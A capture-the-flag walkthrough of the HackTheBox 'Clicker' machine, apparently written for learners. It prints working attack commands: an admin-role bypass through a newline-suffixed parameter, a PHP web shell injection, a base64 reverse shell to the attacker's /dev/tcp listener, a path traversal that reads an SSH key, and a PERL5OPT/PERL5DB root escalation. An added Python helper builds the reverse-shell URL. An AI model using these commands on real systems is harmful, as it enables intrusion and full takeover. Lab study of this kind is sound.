Clicker — HackTheBox Machine Simple Writeup by Karthikeyan Nagaraj | 2024


HackTheBox’s Medium Machine — Clicker | Approach and Walkthrough with Hints

Karthikeyan Nagaraj

Enumeration and Analysis
Initial Foothold
  1. Port — 2049
  2. Port — 80
  3. User.txt
  4. Alternate Option to get into the Machine
Privilege Escalation
Simple Video PoC (for section 2.4)

Note: I'm unable to do an elaborate writeup for now; I hope to post one soon.

Enumeration and Analysis

1. Start the VPN and perform a basic Nmap scan:
nmap -sC -sV 10.10.11.232

2. Open 10.10.11.232 in a browser; it will show the hostname after the redirection.

3. Add the hostname to /etc/hosts with the following command so that clicker.htb resolves:
echo "10.10.11.232 clicker.htb" | sudo tee -a /etc/hosts

4. Then perform directory enumeration with either of the following commands:
dirsearch -u clicker.htb -e*
(or)
gobuster dir -u http://clicker.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

5. Similarly, perform DNS (subdomain) enumeration:
gobuster dns -d clicker.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20

Initial Foothold

1. Port — 2049

Port 2049 is used by the Network File System (NFS), a client/server protocol that lets hosts access files over the network as if they were in a local directory. To list the shares the Clicker machine exports, run:
showmount -e clicker.htb
Then mount the export and copy the backup out of it:
sudo mkdir /mnt/nfs
sudo mount clicker.htb:/ /mnt/nfs -o nolock
cd /mnt/nfs/mnt/backups
cp clicker.htb_backup.zip LOCATION_TO_UNZIP
After unzipping the file we have the website's source code, which is what we will read to find the flaw in the web application.

2. Port — 80

Comparing the live website with the source we recovered from the backup reveals a flaw in the web application that lets us execute arbitrary commands. To exploit it, create an account and log in. Click Play, turn on intercept in your proxy, click Save, and capture the request. Modify the parameters as below and send the request:
/save_game.php?clicks=1&level=1&role%0a=Admin
The application rejects a parameter named role, but role with a URL-encoded newline (%0a) appended is not the string "role" and passes that check, while the database still treats the trailing newline as whitespace, so the role column is what gets updated. The request above therefore makes us Admin. Log out and log in again and you will see an Administrator panel.

Click Play again and capture the /save_game.php request. Append the following parameter to the end of the request:
&nickname=<%3fphp+system($_GET['cmd'])+%3f>
Go Home, open Administration, click Export, and capture the request. Change the extension of the exported file to php and send the request; the exported file now contains our PHP web shell.

Open a terminal and start a listener:
nc -lvnp 4444
In another terminal, generate the base64 reverse-shell payload, replacing <your ip> with your VPN address (the >& redirection is bash syntax, which is why the decoded line is piped to bash on the target):
echo "sh -i >& /dev/tcp/<your ip>/4444 0>&1" | base64
Now request the exported file (the file name is the one you gave the export), passing the decoded payload to the web shell through the cmd parameter:
http://clicker.htb/exports/FILENAME.php?cmd=echo "<encoded base64 rev shell code>" | base64 -d | bash
A browser percent-encodes the spaces and quotes for you; if you send it with curl instead, let curl encode the value with -G --data-urlencode "cmd=...". If everything went right you will get a reverse shell on the listener; otherwise use the alternate option in section 4 to get into the machine.
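The %0a trick and the final cmd request are the two places in this section where encoding decides whether the attack works. The following added Python example (mine, not the Clicker application's code) models them: a small sqlite3 stand-in for the players table with an assumed vulnerable save handler beside a hardened one, and a helper that builds a correctly encoded trigger URL. The table layout, the handler logic, the tester account and the attacker address 10.10.14.5 are constructed assumptions.

```python
import base64
import sqlite3
from urllib.parse import parse_qs, parse_qsl, urlencode, urlparse

# Added example (not the Clicker application's code). It models the two encoding
# tricks used in the writeup: a parameter key that slips past a name check because
# it ends in a newline, and the properly encoded URL that reaches the injected web
# shell. Table layout, handler logic and the 'tester' account are assumptions.


def setup_db():
    """In-memory stand-in for the game's players table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE players (username TEXT PRIMARY KEY, "
               "clicks INTEGER, level INTEGER, role TEXT)")
    db.execute("INSERT INTO players VALUES ('tester', 0, 1, 'User')")
    db.commit()
    return db


def parse_query(qs):
    """Decode the query string the way PHP fills $_GET: 'role%0a' becomes 'role\\n'."""
    return parse_qsl(qs, keep_blank_values=True)


def save_game_vulnerable(db, username, params):
    """Assumed vulnerable handler: refuses a key named 'role', then splices every
    other key into the UPDATE as a bare column name. 'role\\n' is not equal to
    'role', yet SQL treats the trailing newline as whitespace, so the column that
    ends up being updated is still role."""
    assignments, values = [], []
    for key, value in params:
        if key.lower() == "role":
            raise PermissionError("Malicious activity detected!")
        assignments.append(f"{key} = ?")
        values.append(value)
    db.execute(f"UPDATE players SET {', '.join(assignments)} WHERE username = ?",
               values + [username])
    db.commit()


ALLOWED = {"clicks": int, "level": int}   # columns a player may legitimately update


def save_game_hardened(db, username, params):
    """Fixed handler: only allow-listed column names reach the query, each value is
    coerced to the column's type, and any other key is rejected before any SQL runs."""
    assignments, values = [], []
    for key, value in params:
        if key not in ALLOWED:
            raise PermissionError(f"unexpected parameter {key!r}")
        assignments.append(f"{key} = ?")
        values.append(ALLOWED[key](value))
    db.execute(f"UPDATE players SET {', '.join(assignments)} WHERE username = ?",
               values + [username])
    db.commit()


def role_of(db, username):
    return db.execute("SELECT role FROM players WHERE username = ?",
                      (username,)).fetchone()[0]


def run_bypass(handler, query="clicks=1&level=1&role%0a=Admin"):
    """Feed the writeup's payload to a handler; return (role afterwards, was it rejected)."""
    db = setup_db()
    try:
        handler(db, "tester", parse_query(query))
        rejected = False
    except PermissionError:
        rejected = True
    return role_of(db, "tester"), rejected


def trigger_url(export_name, lhost, lport, base="http://clicker.htb"):
    """Build the GET that reaches system($_GET['cmd']) in the exported file. The shell
    one-liner is base64-wrapped and the whole command percent-encoded, so '|', '>',
    spaces and quotes survive the trip through browser, web server and PHP."""
    shell = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    b64 = base64.b64encode(shell.encode()).decode()
    return f"{base}/exports/{export_name}?" + urlencode(
        {"cmd": f'echo "{b64}" | base64 -d | bash'})


def recover_shell_line(url):
    """What the target ends up executing: decode the query as PHP would, then
    undo the base64 wrapping the way `base64 -d` does."""
    cmd = parse_qs(urlparse(url).query)["cmd"][0]
    return base64.b64decode(cmd.split('"')[1]).decode()


if __name__ == "__main__":
    print(run_bypass(save_game_vulnerable))   # ('Admin', False): role was changed
    print(run_bypass(save_game_hardened))     # ('User', True): request rejected
    print(trigger_url("FILENAME.php", "10.10.14.5", 4444))
```

The hardened handler is the fix a reviewer would ask for: the client never gets to name a column, so there is nothing for a newline, a different case or any other encoding trick to slip past.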

3. User.txt

Inspecting the directories turns up something interesting in /opt/manage/: an executable, execute_query, used to read, modify and update SQL statements. Its option 5 reads a file whose path it resolves relative to a directory under jack's home, so a path traversal lets us read the user's private SSH key:
cd /opt/manage/
./execute_query 5 ../.ssh/id_rsa
It prints jack's private key. Copy it into a file on your machine (no extension needed):
nano KEY_FILENAME
Then, with the key in the current directory, restrict its permissions (ssh refuses a key readable by others) and log in:
chmod 600 KEY_FILENAME
ssh jack@clicker.htb -i KEY_FILENAME
Now you can read user.txt.

4. Alternate Option to get into the Machine

I'm providing this section only for those who are making mistakes in getting into the machine. I hope you will use it only temporarily, and make sure to fix any mistakes you made in getting the reverse shell. To get into the machine you can use the SSH private key of the user jack, which you can get here.

After you have downloaded the file, follow the steps in section 3 to get user.txt.

Privilege Escalation

Start with sudo -l, which lists the commands the invoking user is allowed (or not allowed) to run with elevated privileges on the current host. It reveals that jack can run the script /opt/monitor.sh as root. Inspecting the script shows that it runs a Perl program, and the way it is invoked exposes it to what is known as the Perl startup privilege escalation: with PERL5OPT=-d the Perl interpreter starts under its debugger, and PERL5DB supplies the debugger's initialisation code, which is executed as root before the script's own code. Run the following to get root:
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
bash -p
The first command makes /bin/bash setuid root; bash -p then starts a shell that keeps the effective root privileges instead of dropping them.

A YouTube channel for cybersecurity lab PoCs and write-ups

Telegram Channel for Free Ethical Hacking Dumps

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
